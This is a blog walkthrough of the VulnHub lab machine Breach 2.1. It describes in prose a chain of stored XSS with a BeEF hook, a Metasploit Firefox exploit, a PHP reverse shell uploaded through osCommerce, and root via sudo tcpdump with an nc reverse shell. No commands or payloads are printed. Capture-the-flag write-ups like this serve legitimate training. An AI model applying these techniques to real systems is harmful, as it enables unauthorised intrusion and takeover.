Safetech Blog - Security Tips and Tricks


by Oana Stoian

Breach: 2.1

Dear all, this day I will present you my way of exploiting the vulnerable machine-Breach 2.1. Many thanks to @mrb3n813 and @VulnHub.

For information gathering I will be using nmap:

The  ssh port is opened : 65535, so let’s try to connect to it:

A banner is displayed, and we find out about a possible user named Peter. Also a information that could be useful is that on the machine maybe a blog, even if there is no web port revealed.

We could try our luck with user Peter on ssh….but a big problem is the password. Is really hard to believe that the password is right behind your eyes: inthesource 🙂

I fired-up nmap one more time, and I get lucky….the port 80 is opened, running on an Apache server.

The browser will display a photo. I’ve tried to search for more information, so I used Exiftool, but unfortunately no medata found. Next step was to look on the page source, and there I could read a message, that can be observed in the second print screen:

beef_photo

source.

One of the hints for the web server is the blog.  To be sure, I also used the dirb, to do the brute force .

blog

Seems like an old PHP blog engine is running, so there are a lot of chances to find exploits/vulnerabilities.

Connecting all the information, like Peter is visiting the blog often, the picture on the main page of the web server mentioning Beef, I started to think for a client side exploit. Looking over exploit-db there are a lot of exploits for blogphp, including SQLi and persistent XSS.

I exploited the SQLi but the username is blank and the hash of the password will also lead to a blank charcter, so no important data here.

Going further with a persistent XSS, I started with Beef framework and injected the XSS hook into register.html web form, in the username parameter.

In short time a Firefox browser has connected to Beef giving us hope that indeed client side exploitation is the way to go.

beef2

To exploit this browser we’ll use the metasploit framework. After some tries and errors we decided to use firefox_tostring_console_injection exploit. Using again the persistent XSS from register.html webpage I injected an iframe that will point the Firefox browser to our metasploit web server.

In short time a shell is received and we can interact with the operating system.

We started a second shell because the metasploit one was being closed regularly by the server:

Now, we are connected as user Peter and we can start our journey to get root. I did some enumeration, like what files are readable in other users folders, what services are running, kernel version, special permission files etc. but nothing popped-out. Then, by listing the network services that are running on the host, we observe that not only ssh (65535) and http (80) are running but also an unknown service is present on port 2323/localhost and mysql is listening also on localhost.

Trying a telnet on localhost 2323 will print some gps coordinates: 29 45’46” N 95 22’59” W

Looking for them on a browser it will indicate Houston/Texax :

houston

 

Next, we are asked for login. After some tries with combinations of peter, milton and blumbergh users and Houston, we are able to login with milton/Houston credentials. Next, another challenge must be passed – we are asked „Whose stapler is it?” What would Milton respond? Of course, „mine” 🙂

Now that we are logged in as milton, we are curious to take a look on his login/profile scripts, which certainly are executed when someone telnets on 2323 port.

Here we find a script /usr/local/bin/cd.py that is responsable for asking the stapler question, and also we observe that a new web server (nginx) is started – so we can assume that we will find another port open – wich is 8888.

8888

Here we have an oscommerce application ready to be broken.

Returning to our shell we also noticed that nginix is running as root user, so by exploiting the application we might obtain root privileges.

I suddenly remembered that we have a mysql running on the host,  and I returned to the shell console and tried to connect to it.

Now we can get out user accounts for oscommerce:

Searching the hash on google will get us the „complicated” password wich is admin.

Now we can connect to the oscommerce administrative interface and search for a way to obtain a reverse shell:

admin_oscommerce

Here we have a File Manager and it is just a matter of time to discover an writable folder where we will upload our shell:

php_uploaded

This will get us a reverse shell, but we are not there yet…. the user is not root as we expected, is blumbergh:

As we already know various information of the machine – like running prcesses, special files, and so on and we do not need to do that one more time as blumbergh, we try to see what commands is blumbergh allowed to run through sudo and we discover that he can run tcpdump as root. Thinking that this might be it, I documented about tcpdump looking for some ways of executing arbitrary commands. The man page and previous experience were important and we got to the following syntax:

The /tmp/breach file should contain whatever command we would like to be executed as root, so we will put a classic nc reverse shell connection in it.

 

Now we are finally root and we can get our precious flag:

flag.py

6,338 total views, 16 views today





Comments

  1. By N13manT

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *